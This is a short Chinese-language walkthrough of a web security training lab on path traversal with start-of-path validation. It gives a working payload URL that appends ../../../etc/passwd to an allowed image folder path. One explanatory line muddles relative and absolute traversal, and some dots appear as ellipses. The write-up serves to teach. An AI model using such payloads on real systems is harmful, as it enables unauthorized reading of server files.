Lab: File path traversal, validation of start of path：文件路径遍历，起始路径验证

靶场内容：

本实验室在产品图片显示中存在文件路径遍历漏洞。

应用程序通过请求参数传输完整的文件路径，并验证提供的路径是否以预期的文件夹开头。

要解决实验室问题，请检索/etc/passwd文件的内容。

漏洞分析

• 打开图片链接，可以看到，图片后面跟上了绝对路径：https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy.net/image?filename=/var/www/images/29.jpg
• /var和/etc一样属于一级目录
• 这个漏洞在于，它不允许相对路径的遍历，只允许绝对路径的遍历
• 所以我们只需要在后面加上…/…/…/etc/passwd即可
• https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd

关键截图：